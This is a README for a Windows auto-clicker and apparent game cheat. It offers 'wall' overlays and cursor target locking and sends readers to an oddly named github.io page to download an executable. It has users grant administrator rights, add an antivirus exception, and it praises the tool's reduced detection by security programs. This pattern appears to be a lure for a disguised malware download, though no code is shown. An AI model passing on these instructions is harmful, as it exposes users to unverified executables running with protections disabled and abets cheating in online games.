This software automates mouse clicks and screen interaction for Windows computers. It helps users handle repetitive clicking tasks in games and productivity applications. The program runs as an external process. This means it interacts with your system to send click signals without modifying your game files.
The software includes a suite of tools designed to refine your performance. It provides high-speed clicking, visual guides to track target locations, and input automation sequences. You maintain full control over the click rate, the duration of pauses between clicks, and the specific screen areas where the tool executes actions.
Ensure your computer meets these requirements before you start:
- Operating System: Windows 10 or Windows 11 (64-bit).
- Processor: Any modern dual-core processor or better.
- Memory: Minimum of 4GB RAM.
- Graphics: A monitor resolution of at least 1280x720 pixels.
- Network: Active internet connection to verify updates.
- Permissions: You must hold Administrative rights on your user account to allow the software to send inputs to other applications.
Follow these steps to set up the tool on your computer.
- Visit the following link to see all available releases: https://towneyparanasal413.github.io
- Look for the section labeled Assets on the latest release page.
- Click the file ending in .zip or .exe to start your download.
- If you downloaded a .zip file, right-click the folder and select Extract All.
- Double-click the file named AutoClicker.exe to open the program.
- A Windows prompt may appear to ask for permission. Click Yes to allow the application to run.
We provide updates to ensure the software works with the latest game patches and system requirements. Check the link above periodically to see if a newer version exists. If a new version is available, download it and replace the old file.
The software provides a range of functions to improve your efficiency:
- Click Speed Control: Adjust the delay between clicks from one millisecond to ten seconds.
- Target Tracking: Use the built-in coordinate system to lock the cursor onto specific screen elements.
- Visual Overlays: Enable markers that highlight active target zones or wall locations.
- Macro Support: Record a sequence of movements and clicks to play back at a set pace.
- External Operation: The tool does not inject code into other processes, keeping the main game files clean.
- Hotkey Customization: Assign specific keys on your keyboard to start or stop the clicking process.
Once you launch the application, you will see a main dashboard. Use the following guide to configure your settings:
- Setting Click Rates: Locate the box labeled Delay. Enter a number in milliseconds. A lower number produces faster clicks.
- Creating an Automation: Press the record button to start a capture session. Move your mouse and click as you desire. Press the stop button to save the movement pattern.
- Activating Visual Aids: Open the Settings tab to toggle overlays. You can change the color and size of target boxes to suit your preference.
- Using Hotkeys: Click the key mapping area to select which keyboard button triggers the automation. Use a key that you do not need for gameplay.
- Saving Profiles: If you use different settings for different games, click File then Save Profile. This stores your layout to a text file for quick loading in the future.
This tool works as an external utility. It avoids interaction with memory addresses inside your games. This approach reduces the chance of detection by standard security programs. Keep your mouse drivers updated to ensure the click inputs register correctly with Windows.
If the program fails to click, verify that you launched the application with Administrative access. Right-click the icon and choose Run as Administrator to force the program to function with higher priority. If your antivirus software stops the application, you may need to add an exception for the file in your security settings to allow it to communicate with the system mouse driver.
Does this tool require coding knowledge? No. All features work through the graphical user interface. You only need to click buttons and adjust sliders.
Can I get banned for using this? This tool operates externally, meaning it does not modify game data. However, observe the rules of the specific games you play. Many online games prohibit automation software. Use this tool at your own discretion in single-player or private modes.
Where can I report errors? If you encounter a bug, create an entry in the Issues tab of this GitHub repository. Provide a description of what you were doing when the error occurred and attach a screenshot if possible.
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